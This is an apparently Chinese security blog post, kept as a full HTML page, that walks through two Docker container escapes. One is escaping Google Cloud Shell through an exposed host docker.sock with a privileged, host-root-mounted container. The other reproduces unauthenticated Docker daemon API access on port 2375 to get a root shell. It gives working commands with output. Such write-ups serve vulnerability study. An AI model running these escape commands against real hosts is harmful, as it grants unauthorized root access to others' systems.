<!DOCTYPE html>
<html>

    <head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="本站由哨兵安全实验室支持创办">

<link rel="shortcut icon" href="/assets/img/favicon.png">
<link type="application/atom+xml" rel="alternate" href="/feed.xml" title="©「哨兵」| Sentry Security" />



<!-- Open Graph metadata -->
<meta property="og:type" content="website" />
<meta property="og:title" content="「DOCKER」:谈谈docker逃逸那点事 | ©「哨兵」| Sentry Security" />
<meta property="og:description" content="本站由哨兵安全实验室支持创办" />
<meta property="og:image" content="http://localhost:80/assets/img/logo-share.png" /> <!-- WeChat requires that thumbnail image is larger than 300x300 -->
<meta property="og:url" content="http://localhost:80/blog/2020/docker/escape/" />
<title> 「DOCKER」:谈谈docker逃逸那点事 | ©「哨兵」| Sentry Security | Sentrylab</title>

<link rel="stylesheet" type="text/css" href="/assets/css/pace-minimal.css">
<script src="/assets/js/pace.min.js"></script>


<!-- Bootstrap core CSS -->
<link href="/assets/css/bootstrap.css" rel="stylesheet">
<!-- Custom styles for this template -->
<link href="/assets/css/style.css" rel="stylesheet">
<link href="/assets/css/font-awesome.min.css" rel="stylesheet">
<link href="/assets/css/font-awesome-v4-shims.min.css" rel="stylesheet">
<link rel="stylesheet" href="/assets/css/404-style.css">


<script src="/assets/js/jquery.min.js"></script>
<script src="/assets/js/bootstrap.min.js"></script>




</head>


    <body>
        <!-- Fixed navbar -->
<div class="navbar navbar-default navbar-fixed-top" role="navigation">
  <div class="container">
    <div class="navbar-header">
      <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
      <a class="navbar-brand" href="/"><!--
   --><picture>
  <source srcset="/assets/img/logo-small-dark.png 1x, /assets/img/logo-small-dark@2x.png 2x, /assets/img/logo-small-dark@3x.png 3x, /assets/img/logo-small-dark@4x.png 4x" media="(prefers-color-scheme: dark)" />
  
  <img src="/assets/img/logo-small.jpg" srcset="/assets/img/logo-small.png 1x, /assets/img/logo-small@2x.png 2x, /assets/img/logo-small@3x.png 3x, /assets/img/logo-small@4x.png 4x" />
  </picture> Sentrylab</a>
    </div>
    <div class="navbar-collapse collapse navbar-right">
      <ul class="nav navbar-nav">
        <li ><a href="/">HOME</a></li>
        <li class="active"><a href="/blog/">BLOG</a></li>
        <li ><a href="/events/">EVENTS</a></li>
        <li ><a href="/categories/">CATEGORIES</a></li>
        <li ><a href="/daily/">DAILY</a></li>
        <li><a href="https://about.sentrylab.cn">ABOUT ME</a></li>
      </ul>
    </div><!--/.nav-collapse -->

  </div>
</div>

            <div class="container mtb">
    <div class="row">
        <!-- SINGLE POST -->
        <div class="col-lg-8">
            <!-- Blog Post  -->
            <a href="/blog/2020/docker/escape/"><h3 class="ctitle">「DOCKER」:谈谈docker逃逸那点事</h3></a>
            <p><csmall>May 17, 2020. |  By: Bin4xin.</csmall></p>
            <div class="post-content"> 
            <h2 id="google-cloud-shell-docker逃逸">Google Cloud Shell Docker逃逸</h2>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>docker <span class="nt">-H</span> unix:///google/host/var/run/docker.sock pull alpine:latest
Welcome to Cloud Shell! Type <span class="s2">"help"</span> to get started.
Your Cloud Platform project <span class="k">in </span>this session is <span class="nb">set </span>to avid-rope-267508.
Use “gcloud config <span class="nb">set </span>project <span class="o">[</span>PROJECT_ID]” to change to a different project.
chihou_pro@cloudshell:~ <span class="o">(</span>avid-rope-267508<span class="o">)</span><span class="nv">$ </span><span class="nb">sudo </span>su
root@cs-6000-devshell-vm-d336a485-4d57-485b-bd84-220ac5dd5619:/home/chihou_pro# <span class="nb">ls
</span>README-cloudshell.txt
</code></pre></div></div>
<!--
![GitHub](https://avatars2.githubusercontent.com/u/3265208?v=3&s=100 =260x100 "GitHub,Social Coding")
-->

<p>很明显的看到，使用了docker容器，<a href="https://xz.aliyun.com/t/6982" title="helloworld:)">参考</a>：</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@cs-6000-devshell-vm-d336a485-4d57-485b-bd84-220ac5dd5619:/home/chihou_pro# <span class="nb">cat</span> /proc/1/cgroup
12:hugetlb:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
11:perf_event:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
10:cpu,cpuacct:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
9:cpuset:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
8:memory:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
7:devices:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
6:freezer:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
5:blkio:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
4:rdma:/
3:pids:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
2:net_cls,net_prio:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
1:name<span class="o">=</span>systemd:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
0::/system.slice/containerd.service
</code></pre></div></div>

<h3 id="发现docker">发现docker</h3>
<p>我们可以看到<code class="language-plaintext highlighter-rouge">kubepods</code>等关键词，浏览了文件系统之后，注意到有2个Docker unix套接字可用。在<code class="language-plaintext highlighter-rouge">/run/docker.sock</code>中，这是我们在Cloud Shell中运行的Docker客户端的默认路径。</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@cs-6000-devshell-vm-d336a485-4d57-485b-bd84-220ac5dd5619:/# <span class="nb">cat </span>run/
docker/         docker.sock     google/         metrics/        postgresql/     sshd/           supervisor.pid  xtables.lock
docker.pid      docker-ssd.pid  lock/           mount/          rsyslogd.pid    sshd.pid        utmp
</code></pre></div></div>
<p>/google/host/var/run/docker.sock套接字，这是第二个。</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@cs-6000-devshell-vm-d336a485-4d57-485b-bd84-220ac5dd5619:/# <span class="nb">ls</span> /google/host/var/run/
agetty.reload  cloud-init        command-recorder  crash_reporter  docker      dockershim.sock  initctl  lockbox  lvm         metrics  sshd.pid  systemd  tmpfiles.d  user  vm
blkid          cloudshell-creds  containerd        dbus            docker.pid  docker.sock      lock     log      machine-id  mount    <span class="nb">sudo      </span>theia    udev        utmp  xtables.lock
</code></pre></div></div>
<p>然后根据上面的可利用套接字准备一个bash文件进行docker逃逸:-)
new a bash file to escape docker in google_cloud_shell.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>docker <span class="nt">-H</span> unix:///google/host/var/run/docker.sock pull alpine:latest
<span class="nb">sudo </span>docker <span class="nt">-H</span> unix:///google/host/var/run/docker.sock run <span class="nt">-d</span> <span class="nt">-it</span> <span class="nt">--name</span> LiveOverflow-container <span class="nt">-v</span> <span class="s2">"/proc:/host/proc"</span> <span class="nt">-v</span> <span class="s2">"/sys:/host/sys"</span> <span class="nt">-v</span> <span class="s2">"/:/rootfs"</span> <span class="nt">--network</span><span class="o">=</span>host <span class="nt">--privileged</span><span class="o">=</span><span class="nb">true</span> <span class="nt">--cap-add</span><span class="o">=</span>ALL alpine:latest
<span class="nb">sudo </span>docker <span class="nt">-H</span> unix:///google/host/var/run/docker.sock start LiveOverflow-container
<span class="nb">sudo </span>docker <span class="nt">-H</span> unix:///google/host/var/run/docker.sock <span class="nb">exec</span> <span class="nt">-it</span> LiveOverflow-container /bin/sh
</code></pre></div></div>

<p>运行bash文件</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@cs-6000-devshell-vm-d336a485-4d57-485b-bd84-220ac5dd5619:/home/chihou_pro# bash docker_escape.sh
latest: Pulling from library/alpine
Digest: sha256:39eda93d15866957feaee28f8fc5adb545276a64147445c64992ef69804dbf01
Status: Image is up to <span class="nb">date </span><span class="k">for </span>alpine:latest
docker.io/library/alpine:latest
docker: Error response from daemon: Conflict. The container name <span class="s2">"/LiveOverflow-container"</span> is already <span class="k">in </span>use by container <span class="s2">"2e2896994c459d7be0a6acb613c8be509ef5158cb97ddac4b5e30b2fed770d56"</span><span class="nb">.</span> You have to remove <span class="o">(</span>or rename<span class="o">)</span> that container to be able to reuse that name.
See <span class="s1">'docker run --help'</span><span class="nb">.</span>
LiveOverflow-container
/ <span class="c"># whoami</span>
root
</code></pre></div></div>
<p>如上，逃逸成功</p>

<h2 id="docker-daemon-api漏洞复现">docker daemon api漏洞复现</h2>
<p>验证漏洞存在：</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">[</span>root@iZ2ze9ebgot9gy5c2mi5ecZ unauthorized-rce]# curl http://vuln_docker_ip:2375/info
<span class="o">{</span><span class="s2">"ID"</span>:<span class="s2">"OY55:HR25:LKHP:XTLU:LCID:Y64D:46WQ:4T5U:U2SF:5PVW:R7I3:T6KV"</span>,<span class="s2">"Containers"</span>:2,<span class="s2">"ContainersRunning"</span>:1,<span class="s2">"ContainersPaused"</span>:0,<span class="s2">"ContainersStopped"</span>:1,<span class="s2">"Images"</span>:1,<span class="s2">"Driver"</span>:<span class="s2">"overlay2"</span>,<span class="s2">"DriverStatus"</span>:[[<span class="s2">"Backing Filesystem"</span>,<span class="s2">"extfs"</span><span class="o">]</span>,[<span class="s2">"Supports d_type"</span>,<span class="s2">"true"</span><span class="o">]</span>,[<span class="s2">"Native Overlay Diff"</span>,<span class="s2">"true"</span><span class="o">]]</span>,<span class="s2">"SystemStatus"</span>:null,<span class="s2">"Plugins"</span>:<span class="o">{</span><span class="s2">"Volume"</span>:[<span class="s2">"local"</span><span class="o">]</span>,<span class="s2">"Network"</span>:[<span class="s2">"bridge"</span>,<span class="s2">"host"</span>,<span class="s2">"macvlan"</span>,<span class="s2">"null"</span>,<span class="s2">"overlay"</span><span class="o">]</span>,<span class="s2">"Authorization"</span>:null,<span class="s2">"Log"</span>:[<span class="s2">"awslogs"</span>,<span class="s2">"fluentd"</span>,<span class="s2">"gcplogs"</span>,<span class="s2">"gelf"</span>,<span class="s2">"journald"</span>,<span class="s2">"json-file"</span>,<span class="s2">"logentries"</span>,<span class="s2">"splunk"</span>,<span class="s2">"syslog"</span><span class="o">]}</span>,<span class="s2">"MemoryLimit"</span>:true,<span class="s2">"SwapLimit"</span>:true,<span class="s2">"KernelMemory"</span>:true,<span class="s2">"CpuCfsPeriod"</span>:true,<span class="s2">"CpuCfsQuota"</span>:true,<span class="s2">"CPUShares"</span>:true,<span class="s2">"CPUSet"</span>:true,<span class="s2">"IPv4Forwarding"</span>:true,<span class="s2">"BridgeNfIptables"</span>:false,<span class="s2">"BridgeNfIp6tables"</span>:false,<span class="s2">"Debug"</span>:false,<span class="s2">"NFd"</span>:29,<span class="s2">"OomKillDisable"</span>:true,<span class="s2">"NGoroutines"</span>:51,<span class="s2">"SystemTime"</span>:<span class="s2">"2020-05-22T02:44:08.778253143Z"</span>,<span class="s2">"LoggingDriver"</span>:<span class="s2">"json-file"</span>,<span class="s2">"CgroupDriver"</span>:<span class="s2">"cgroupfs"</span>,<span class="s2">"NEventsListener"</span>:0,<span class="s2">"KernelVersion"</span>:<span class="s2">"3.10.0-1062.12.1.el7.x86_64"</span>,<span class="s2">"OperatingSystem"</span>:<span class="s2">"Alpine Linux v3.7 (containerized)"</span>,<span class="s2">"OSType"</span>:<span class="s2">"linux"</span>,<span class="s2">"Architecture"</span>:<span class="s2">"x86_64"</span>,<span class="s2">"IndexServerAddress"</span>:<span class="s2">"https://index.docker.io/v1/"</span>,<span class="s2">"RegistryConfig"</span>:<span class="o">{</span><span class="s2">"AllowNondistributableArtifactsCIDRs"</span>:[],<span class="s2">"AllowNondistributableArtifactsHostnames"</span>:[],<span class="s2">"InsecureRegistryCIDRs"</span>:[<span class="s2">"127.0.0.0/8"</span><span class="o">]</span>,<span class="s2">"IndexConfigs"</span>:<span class="o">{</span><span class="s2">"docker.io"</span>:<span class="o">{</span><span class="s2">"Name"</span>:<span class="s2">"docker.io"</span>,<span class="s2">"Mirrors"</span>:[],<span class="s2">"Secure"</span>:true,<span class="s2">"Official"</span>:true<span class="o">}}</span>,<span class="s2">"Mirrors"</span>:[]<span class="o">}</span>,<span class="s2">"NCPU"</span>:2,<span class="s2">"MemTotal"</span>:3973296128,<span class="s2">"GenericResources"</span>:null,<span class="s2">"DockerRootDir"</span>:<span class="s2">"/var/lib/docker"</span>,<span class="s2">"HttpProxy"</span>:<span class="s2">""</span>,<span class="s2">"HttpsProxy"</span>:<span class="s2">""</span>,<span class="s2">"NoProxy"</span>:<span class="s2">""</span>,<span class="s2">"Name"</span>:<span class="s2">"14e1a228e781"</span>,<span class="s2">"Labels"</span>:[],<span class="s2">"ExperimentalBuild"</span>:false,<span class="s2">"ServerVersion"</span>:<span class="s2">"18.03.0-ce"</span>,<span class="s2">"ClusterStore"</span>:<span class="s2">""</span>,<span class="s2">"ClusterAdvertise"</span>:<span class="s2">""</span>,<span class="s2">"Runtimes"</span>:<span class="o">{</span><span class="s2">"runc"</span>:<span class="o">{</span><span class="s2">"path"</span>:<span class="s2">"docker-runc"</span><span class="o">}}</span>,<span class="s2">"DefaultRuntime"</span>:<span class="s2">"runc"</span>,<span class="s2">"Swarm"</span>:<span class="o">{</span><span class="s2">"NodeID"</span>:<span class="s2">""</span>,<span class="s2">"NodeAddr"</span>:<span class="s2">""</span>,<span class="s2">"LocalNodeState"</span>:<span class="s2">"inactive"</span>,<span class="s2">"ControlAvailable"</span>:false,<span class="s2">"Error"</span>:<span class="s2">""</span>,<span class="s2">"RemoteManagers"</span>:null<span class="o">}</span>,<span class="s2">"LiveRestoreEnabled"</span>:false,<span class="s2">"Isolation"</span>:<span class="s2">""</span>,<span class="s2">"InitBinary"</span>:<span class="s2">"docker-init"</span>,<span class="s2">"ContainerdCommit"</span>:<span class="o">{</span><span class="s2">"ID"</span>:<span class="s2">"cfd04396dc68220d1cecbe686a6cc3aa5ce3667c"</span>,<span class="s2">"Expected"</span>:<span class="s2">"cfd04396dc68220d1cecbe686a6cc3aa5ce3667c"</span><span class="o">}</span>,<span class="s2">"RuncCommit"</span>:<span class="o">{</span><span class="s2">"ID"</span>:<span class="s2">"4fc53a81fb7c994640722ac585fa9ca548971871"</span>,<span class="s2">"Expected"</span>:<span class="s2">"4fc53a81fb7c994640722ac585fa9ca548971871"</span><span class="o">}</span>,<span class="s2">"InitCommit"</span>:<span class="o">{</span><span class="s2">"ID"</span>:<span class="s2">"949e6fa"</span>,<span class="s2">"Expected"</span>:<span class="s2">"949e6fa"</span><span class="o">}</span>,<span class="s2">"SecurityOptions"</span>:[<span class="s2">"name=seccomp,profile=default"</span><span class="o">]}</span>
</code></pre></div></div>
<p>如上，访问info目录返回了关于docker的信息。直接攻击机运行命令：</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@shell:/home/tool/docker/unauth_rce# docker <span class="nt">-H</span><span class="o">=</span>tcp://vuln_docker_ip:2375 run <span class="nt">-it</span> <span class="nt">-v</span> /:/tmp <span class="nt">--entrypoint</span> /bin/sh alpine:latest
/ <span class="c"># whoami</span>
root
/ <span class="c"># uname -a</span>
Linux aa5ae15c12f0 3.10.0-1062.12.1.el7.x86_64 <span class="c">#1 SMP Tue Feb 4 23:02:59 UTC 2020 x86_64 Linux</span>
/ <span class="c"># ifconfig</span>
eth0      Link encap:Ethernet  HWaddr 02:42:AC:11:00:02
          inet addr:172.17.0.2  Bcast:172.17.255.255  Mask:255.255.0.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:8 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:656 <span class="o">(</span>656.0 B<span class="o">)</span>  TX bytes:0 <span class="o">(</span>0.0 B<span class="o">)</span>

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
</code></pre></div></div>
<p>震惊有木有，我们可以在靶场上复现，现在在撒旦上、fofa上都很少能找到这种程度的漏洞了；在宿主机上查看docker信息：</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">[</span>root@shell unauthorized-rce]# bash /home/docker_shell_exe.sh
docker0   Link encap:Ethernet  HWaddr 02:42:ED:E8:4E:97
          inet addr:172.17.0.1  Bcast:172.17.255.255  Mask:255.255.0.0
          inet6 addr: fe80::42:edff:fee8:4e97/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:3 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 <span class="o">(</span>0.0 B<span class="o">)</span>  TX bytes:266 <span class="o">(</span>266.0 B<span class="o">)</span>

eth0      Link encap:Ethernet  HWaddr 02:42:AC:14:00:02
          inet addr:172.20.0.2  Bcast:0.0.0.0  Mask:255.255.0.0
          inet6 addr: fe80::42:acff:fe14:2/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:45363 errors:0 dropped:0 overruns:0 frame:0
          TX packets:41902 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:10257217 <span class="o">(</span>9.7 MiB<span class="o">)</span>  TX bytes:3704534 <span class="o">(</span>3.5 MiB<span class="o">)</span>

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:55 errors:0 dropped:0 overruns:0 frame:0
          TX packets:55 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:6487 <span class="o">(</span>6.3 KiB<span class="o">)</span>  TX bytes:6487 <span class="o">(</span>6.3 KiB<span class="o">)</span>
</code></pre></div></div>
<p>返回的信息如上，与我们所使用的靶机机器一致；</p>

            </div>
            <div class="spacing"></div>
            <div>
	<div class="hline"></div>
	<h3><em>#</em> 申明</h3>
	<div class="spacing"></div>
	<h4><em>By: Bin4xin.</em></h4>
	<h4>转载请申明本文链接：<a href="/blog/2020/docker/escape/" target="_blank"> 「DOCKER」:谈谈docker逃逸那点事</a></h4>

	<h3><em># Any Questions</em></h3>
	<div class="spacing"></div>
	<h4> >_ 对本文进行提问：<a href="https://github.com/Bin4xin/bin4xin.github.io/issues/new?permalink=https://github.com/Bin4xin/bin4xin.github.io/blob/1b4fffa6232dc6ffa2cece8be0d6c39e0c5f9cfe/blog/2020/docker/escape/index.html%23L84" target="_blank"> <em><li class="fa fa-github"></li> Reference in new issue.</em></a></h4>

	<h4> >_ 对本文进行留言：<a href="https://github.com/Bin4xin/bin4xin.github.io/issues/new?permalink=https://bin4xin.github.io/blog/2020/docker/escape/" target="_blank"> <em><li class="fa fa-github"></li> Leave a Comment.</em></a></h4>
	<div class="spacing"></div>
</div>
        </div><!--/col-lg-8 -->
        
        <div class="col-lg-3">
    <h4>Subscribe/订阅</h4>
    <div class="hline"></div>
        <p>
        <p class="rss-subscribe"><i class="fa fa-rss"></i> Subscribe to this blog <a href="/feed.xml">via RSS</a>.</p>
        </p>
    <div class="spacing"></div>
    <h4>Categories/分类目录</h4>
    <div class="hline"></div>
        
        <div class="post-meta mb-3">
        <div class="spacing"></div>
<!--          <i class="far fa-folder-open fa-fw mr-1"></i>-->
<!--          -->
<!--            <a href='/blog/'>blog</a>-->
<!---->
<!--          -->
<!--            <a href='/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/'>漏洞复现</a>-->
<!---->
<!--          -->
<!--            <a href='/%E7%AC%94%E8%AE%B0/'>笔记</a>-->
<!---->
<!--          -->
<!--            <a href='/docker/'>docker</a>-->
<!---->
<!--          -->
<!--            <a href='/cve/'>CVE</a>-->
<!---->
<!--          -->
            <details>
                <summary class="point">本文分类</summary>
                
                <p>
                    <i class="far fa-folder fa-fw mr-1"></i> <a href='/blog/'>blog</a><!--                    <span class="badge badge-theme pull-right">0</span>-->
                </p>
                
                <p>
                    <i class="far fa-folder fa-fw mr-1"></i> <a href='/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/'>漏洞复现</a><!--                    <span class="badge badge-theme pull-right">0</span>-->
                </p>
                
                <p>
                    <i class="far fa-folder fa-fw mr-1"></i> <a href='/%E7%AC%94%E8%AE%B0/'>笔记</a><!--                    <span class="badge badge-theme pull-right">0</span>-->
                </p>
                
                <p>
                    <i class="far fa-folder fa-fw mr-1"></i> <a href='/docker/'>docker</a><!--                    <span class="badge badge-theme pull-right">0</span>-->
                </p>
                
                <p>
                    <i class="far fa-folder fa-fw mr-1"></i> <a href='/CVE/'>CVE</a><!--                    <span class="badge badge-theme pull-right">0</span>-->
                </p>
                
            </details>
        </div>
        
        <p>
    <details>
        <summary class="point">所有标签/数量</summary>
        
        <p>
            <i class="fa fa-angle-right"></i> Web
            <span class="badge badge-theme pull-right">11</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 漏洞复现
            <span class="badge badge-theme pull-right">9</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 渗透
            <span class="badge badge-theme pull-right">8</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Vulnhub
            <span class="badge badge-theme pull-right">6</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 安全工具
            <span class="badge badge-theme pull-right">5</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 笔记
            <span class="badge badge-theme pull-right">32</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 软件移植
            <span class="badge badge-theme pull-right">2</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Arm
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 主动防御
            <span class="badge badge-theme pull-right">2</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 技巧
            <span class="badge badge-theme pull-right">3</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Android reverse
            <span class="badge badge-theme pull-right">4</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 排错
            <span class="badge badge-theme pull-right">3</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Waf
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Maven
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Python
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Terminal
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Docker
            <span class="badge badge-theme pull-right">3</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Cve
            <span class="badge badge-theme pull-right">3</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Sql-inject
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Bash
            <span class="badge badge-theme pull-right">2</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 内网
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 信息搜集
            <span class="badge badge-theme pull-right">6</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Fuzz
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Vulnhub
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Src
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Daily
            <span class="badge badge-theme pull-right">2</span>
        </p>
    
    </details>
    <div class="spacing"></div>

    <h4>Tags/标签</h4>
    <div class="hline"></div>
    <p>
        
            <a class="btn btn-theme" href='/' role="button">Web (11)</a>
        
            <a class="btn btn-theme" href='/' role="button">漏洞复现 (9)</a>
        
            <a class="btn btn-theme" href='/' role="button">渗透 (8)</a>
        
            <a class="btn btn-theme" href='/' role="button">Vulnhub (6)</a>
        
            <a class="btn btn-theme" href='/' role="button">安全工具 (5)</a>
        
            <a class="btn btn-theme" href='/' role="button">笔记 (32)</a>
        
            <a class="btn btn-theme" href='/' role="button">软件移植 (2)</a>
        
            <a class="btn btn-theme" href='/' role="button">Arm (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">主动防御 (2)</a>
        
            <a class="btn btn-theme" href='/' role="button">技巧 (3)</a>
        
            <a class="btn btn-theme" href='/' role="button">Android reverse (4)</a>
        
            <a class="btn btn-theme" href='/' role="button">排错 (3)</a>
        
            <a class="btn btn-theme" href='/' role="button">Waf (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Maven (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Python (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Terminal (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Docker (3)</a>
        
            <a class="btn btn-theme" href='/' role="button">Cve (3)</a>
        
            <a class="btn btn-theme" href='/' role="button">Sql-inject (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Bash (2)</a>
        
            <a class="btn btn-theme" href='/' role="button">内网 (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">信息搜集 (6)</a>
        
            <a class="btn btn-theme" href='/' role="button">Fuzz (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Vulnhub (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Src (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Daily (2)</a>
        
    </p>
    <div class="spacing"></div>

    <h4>Article Directory/文章目录</h4>
    <div class="hline"></div>
    <p>
        <ul id="toc" class="section-nav">
<li class="toc-entry toc-h2"><a href="#google-cloud-shell-docker逃逸">Google Cloud Shell Docker逃逸</a>
<ul>
<li class="toc-entry toc-h3"><a href="#发现docker">发现docker</a></li>
</ul>
</li>
<li class="toc-entry toc-h2"><a href="#docker-daemon-api漏洞复现">docker daemon api漏洞复现</a></li>
</ul>
    </p>

</div>


    </div><!--/row -->
        
</div><!--/container -->


        <div id="footerwrap">
    <div class="container">
        <div class="row">
            <div class="col-sm-4">
                <div class="col-sm-6">
                  <p class="thuhidden"><strong>入门</strong></p>
                  <p class="thuhidden"><a href="https://github.com/tuna/mirror-web" target="blank"><em>Jekyll</em>源码</a></p>
                  <p class="thuhidden"><a href="https://www.sentrylab.cn/blog/2019/jekyll/in/linux" target="blank">博客搭建教程</a></p>
                  <p class="thuhidden"><a href="https://about.sentrylab.cn/news/sentry-lab-markdown-usage/" target="blank">个性化语法批注</a></p>
                  <p class="thuhidden"><a href="https://www.sentrylab.cn/blog/2019/nginx/with/jekyll-site/" target="blank">公网部署</a></p>
                  </div>

                  <div class="col-sm-6">
                  <p class="thuhidden"><strong>社区</strong></p>
                  <p class="thuhidden"><a href="/blog" target="blank">博客</a></p>
                  <p class="thuhidden"><a href="https://github.com/Bin4xin/bigger-than-bigger/tree/master/CoVV" target="blank"><em>Collection of verified vulnerabilities</em></a></p>
                  <p class="thuhidden"><a href="https://github.com/Bin4xin/bigger-than-bigger" target="blank"><em>Bigger than Bigger</em></a></p>
                  <p class="thuhidden"><a href="https://github.com/Bin4xin/B4xinSynchronize" target="blank"><em>B4xinSynchronize</em></a></p>
                  </div>
            </div>

        <div class="col-sm-4">
                  <div class="col-sm-6">
                    <p class="thuhidden"><strong>开发</strong></p>
                    <p class="thuhidden"><a href="https://github.com/Bin4xin/Bin4xin" target="blank"><em>Bin4xin</em></a></p>
                    <p class="thuhidden"><a href="https://www.cloudflare.com/waf/" target="blank"><em>CloudFlare WAF</em></a></p>
                    <p class="thuhidden"><a href="https://jekyllrb.com/docs/" target="blank"><em>Jekyll</em></a></p>
                    <p class="thuhidden"><a href="https://www.markdownguide.org/" target="blank"><em>MarkDown</em></a></p>
                    <p class="share">
                    <a href="https://github.com/Bin4xin/" target="blank"><i class="fa fa-github"></i></a>
                    <a href="https://twitter.com/Bin4xin"><i class="fa fa-twitter" target="blank"></i></a>
